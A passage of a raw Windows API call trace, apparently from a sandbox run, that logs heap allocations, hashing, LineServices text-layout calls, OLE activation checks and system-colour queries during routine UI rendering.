Size=0xc8) returned 0x64b990 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9eff420 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdcd8 [0161.859] LsSetModWidthPairs () returned 0x0 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f7e90 [0161.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcae0 [0161.859] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.859] IsRectEmpty (lprc=0x197c20) returned 0 [0161.859] UnionRect (in: lprcDst=0x197e10, lprcSrc1=0x197e10, lprcSrc2=0x197c20 | out: lprcDst=0x197e10) returned 1 [0161.860] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.860] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.860] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.860] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.860] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0161.860] HashData (in: pbData=0x197bd4, cbData=0x4, pbHash=0x197be0, cbHash=0x2 | out: pbHash=0x197be0) returned 0x0 [0161.860] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0161.860] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.860] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.861] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0161.861] HashData (in: pbData=0x197bd4, cbData=0x4, pbHash=0x197be0, cbHash=0x2 | out: pbHash=0x197be0) returned 0x0 [0161.861] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0161.861] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.861] IntersectRect (in: lprcDst=0x197d14, lprcSrc1=0x19842c, lprcSrc2=0x197d14 | out: lprcDst=0x197d14) returned 1 [0161.861] IsRectEmpty (lprc=0x197d14) returned 0 [0161.861] GetSysColor (nIndex=15) returned 0xf0f0f0 [0161.862] LsSetDoc () returned 0x0 [0161.862] LsCreateLine () returned 0x0 [0161.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.862] LsdnFinishRegular () returned 0x0 [0161.862] LsDisplayLine () returned 0x0 [0161.862] IOleInPlaceFrame:SetMenu (This=0xd905c0, hmenuShared=0x94d4, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.862] LsDestroyLine () returned 0x0 [0161.863] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.863] LsDestroyContext () returned 0x0 [0161.863] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd668 | out: hHeap=0x5e0000) returned 1 [0161.863] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d83f8 | out: hHeap=0x5e0000) returned 1 [0161.863] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f50 | out: hHeap=0x5e0000) returned 1 [0161.863] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8488 | out: hHeap=0x5e0000) returned 1 [0161.863] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9908 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98b8 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e30 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99f8 | out: hHeap=0x5e0000) returned 1 [0161.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d68 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c78 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da240 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da648 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67bbd8 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdbc0 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb4a0 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb5d8 | out: hHeap=0x5e0000) returned 1 [0161.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b8c0 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff0e8 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cdc88 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcae0 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f7e90 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff280 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b990 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff420 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d5f8 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bc3d0 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efee68 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdcd8 | out: hHeap=0x5e0000) returned 1 [0161.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x630038 | out: hHeap=0x5e0000) returned 1 [0161.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.869] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.869] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.869] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.869] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.869] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.869] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.869] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.869] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.869] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.869] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.869] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.869] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.869] GetSysColor (nIndex=15) returned 0xf0f0f0 [0161.870] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.870] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.870] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.870] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.870] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0161.870] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0161.870] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0161.870] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0161.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0161.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.870] LsSetDoc () returned 0x0 [0161.870] LsCreateLine () returned 0x0 [0161.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.871] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.871] LsdnFinishRegular () returned 0x0 [0161.871] LsDisplayLine () returned 0x0 [0161.871] IOleInPlaceFrame:SetMenu (This=0xd905e0, hmenuShared=0xe10, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.871] GetSysColor (nIndex=8) returned 0x0 [0161.871] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.921] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.922] LsDestroyLine () returned 0x0 [0161.922] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.923] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x6db628 [0161.923] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c40 [0161.923] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.924] CoCreateInstance (in: rclsid=0x6d7210f8*(Data1=0x317d06e8, Data2=0x5f24, Data3=0x433d, Data4=([0]=0xbd, [1]=0xf7, [2]=0x79, [3]=0xce, [4]=0x68, [5]=0xd8, [6]=0xab, [7]=0xc2)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7210e8*(Data1=0xec5ec8a9, Data2=0xc395, Data3=0x4314, Data4=([0]=0x9c, [1]=0x77, [2]=0x54, [3]=0xd7, [4]=0xa9, [5]=0x35, [6]=0xff, [7]=0x70)), ppv=0x1960dc | out: ppv=0x1960dc*=0xc56be8) returned 0x0 [0161.924] IUnknown:AddRef (This=0xc56be8) returned 0x2 [0161.925] QISearch (in: that=0x63edd8, pqit=0x6d6faf10, riid=0x6bdcd710*(Data1=0x3b16811b, Data2=0x6a43, Data3=0x4ec9, Data4=([0]=0xb7, [1]=0x13, [2]=0x3d, [3]=0x5a, [4]=0xc, [5]=0x13, [6]=0xb9, [7]=0x40)), ppv=0x196064 | out: that=0x63edd8, ppv=0x196064*=0x0) returned 0x80004002 [0162.015] QISearch (in: that=0x63edd8, pqit=0x6d6faf10, riid=0x6bdc6848*(Data1=0x7543696a, Data2=0xbc8d, Data3=0x46b0, Data4=([0]=0x5f, [1]=0x81, [2]=0x8d, [3]=0x95, [4]=0x72, [5]=0x89, [6]=0x72, [7]=0xbe)), ppv=0x195fe8 | out: that=0x63edd8, ppv=0x195fe8*=0x0) returned 0x80004002 [0162.015] memcpy_s (in: _Destination=0x1956ec, _DestinationSize=0x400, _Source=0xd21e28, _SourceSize=0x400 | out: _Destination=0x1956ec) returned 0x0 [0162.016] IUnknown:Release (This=0xc56be8) returned 0x1 [0162.023] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63edd8 | out: hHeap=0x5e0000) returned 1 [0162.026] LsSetDoc () returned 0x0 [0162.026] LsCreateLine () returned 0x0 [0162.026] LsDisplayLine () returned 0x0 [0162.026] GetSysColor (nIndex=8) returned 0x0 [0162.026] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.027] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.027] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.027] GetSysColor (nIndex=8) returned 0x0 [0162.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Avalon.Graphics", ulOptions=0x0, samDesired=0x20019, phkResult=0x197480 | out: phkResult=0x197480*=0x0) returned 0x2 [0162.030] LsDestroyLine () returned 0x0 [0162.030] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.031] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.031] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.031] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.031] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.031] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.031] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.031] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.031] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.031] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.031] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.031] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.031] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.031] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.031] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.031] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.032] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.032] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.032] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.032] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.033] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.033] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.033] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x1984b0, cbHash=0x2 | out: pbHash=0x1984b0) returned 0x0 [0162.033] HashData (in: pbData=0x1984ac, cbData=0x4, pbHash=0x1984b8, cbHash=0x2 | out: pbHash=0x1984b8) returned 0x0 [0162.033] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x1984b4, cbHash=0x2 | out: pbHash=0x1984b4) returned 0x0 [0162.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.033] LsSetDoc () returned 0x0 [0162.033] LsCreateLine () returned 0x0 [0162.033] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.033] LsCreateSubline () returned 0x0 [0162.033] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0162.033] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x9eff348 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9cc8 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ea8 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2c68 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9de0 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d90 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9f20 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ed0 [0162.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6caab0 [0162.034] LsFetchAppendToCurrentSubline () returned 0x0 [0162.035] LsFinishCurrentSubline () returned 0x0 [0162.035] LssbGetObjDimSubline () returned 0x0 [0162.035] LsdnSubmitSublines () returned 0x0 [0162.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9d68 [0162.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6d00 [0162.035] LsdnFinishRegular () returned 0x0 [0162.035] LsDisplayLine () returned 0x0 [0162.035] LssbFDonePresSubline () returned 0x0 [0162.035] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0162.036] GetProcAddress (hModule=0x65d00000, lpProcName=0x29) returned 0x65d037a0 [0162.036] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1977c0 | out: lpflOldProtect=0x1977c0*=0x4) returned 1 [0162.037] LsDisplaySubline () returned 0x0 [0162.037] GetSysColor (nIndex=8) returned 0x0 [0162.038] GetSysColor (nIndex=8) returned 0x0 [0162.038] LsDestroyLine () returned 0x0 [0162.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d68 | out: hHeap=0x5e0000) returned 1 [0162.039] LsDestroySubline () returned 0x0 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cc8 | out: hHeap=0x5e0000) returned 1 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ea8 | out: hHeap=0x5e0000) returned 1 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2c68 | out: hHeap=0x5e0000) returned 1 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0162.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d90 | out: hHeap=0x5e0000) returned 1 [0162.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9de0 | out: hHeap=0x5e0000) returned 1 [0162.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f20 | out: hHeap=0x5e0000) returned 1 [0162.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ed0 | out: hHeap=0x5e0000) returned 1 [0162.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff348 | out: hHeap=0x5e0000) returned 1 [0162.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6caab0 | out: hHeap=0x5e0000) returned 1 [0162.041] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.041] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa390) returned 0x0 [0162.041] LsSetDoc () returned 0x0 [0162.041] LsCreateLine () returned 0x0 [0162.041] LsDisplayLine () returned 0x0 [0162.041] GetSysColor (nIndex=8) returned 0x0 [0162.042] GetSysColor (nIndex=8) returned 0x0 [0162.042] LsDestroyLine () returned 0x0 [0162.042] LsSetDoc () returned 0x0 [0162.042] LsCreateLine () returned 0x0 [0162.043] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.043] LsCreateSubline () returned 0x0 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x9eff438 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d90 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9db8 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e30 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e80 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ef8 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ca0 [0162.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6caab0 [0162.044] LsFetchAppendToCurrentSubline () returned 0x0 [0162.044] LsFinishCurrentSubline () returned 0x0 [0162.044] LssbGetObjDimSubline () returned 0x0 [0162.044] LsdnSubmitSublines () returned 0x0 [0162.044] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9d40 [0162.044] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c80 [0162.044] LsdnFinishRegular () returned 0x0 [0162.044] LsDisplayLine () returned 0x0 [0162.044] LssbFDonePresSubline () returned 0x0 [0162.044] LsDisplaySubline () returned 0x0 [0162.045] GetSysColor (nIndex=8) returned 0x0 [0162.045] GetSysColor (nIndex=8) returned 0x0 [0162.046] LsDestroyLine () returned 0x0 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d40 | out: hHeap=0x5e0000) returned 1 [0162.046] LsDestroySubline () returned 0x0 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d90 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9db8 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e80 | out: hHeap=0x5e0000) returned 1 [0162.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e30 | out: hHeap=0x5e0000) returned 1 [0162.047] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ef8 | out: hHeap=0x5e0000) returned 1 [0162.047] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ca0 | out: hHeap=0x5e0000) returned 1 [0162.078] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eff438 | out: hHeap=0x5e0000) returned 1 [0162.079] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6caab0 | out: hHeap=0x5e0000) returned 1 [0162.079] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.079] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa390) returned 0x0 [0162.079] LsSetDoc () returned 0x0 [0162.079] LsCreateLine () returned 0x0 [0162.080] LsDisplayLine () returned 0x0 [0162.080] GetSysColor (nIndex=8) returned 0x0 [0162.081] GetSysColor (nIndex=8) returned 0x0 [0162.081] LsDestroyLine () returned 0x0 [0162.081] LsSetDoc () returned 0x0 [0162.081] LsCreateLine () returned 0x0 [0162.082] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.082] LsCreateSubline () returned 0x0 [0162.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0162.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x9effac8 [0162.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ed0 [0162.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9db8 [0162.082] RtlAllocateHeap 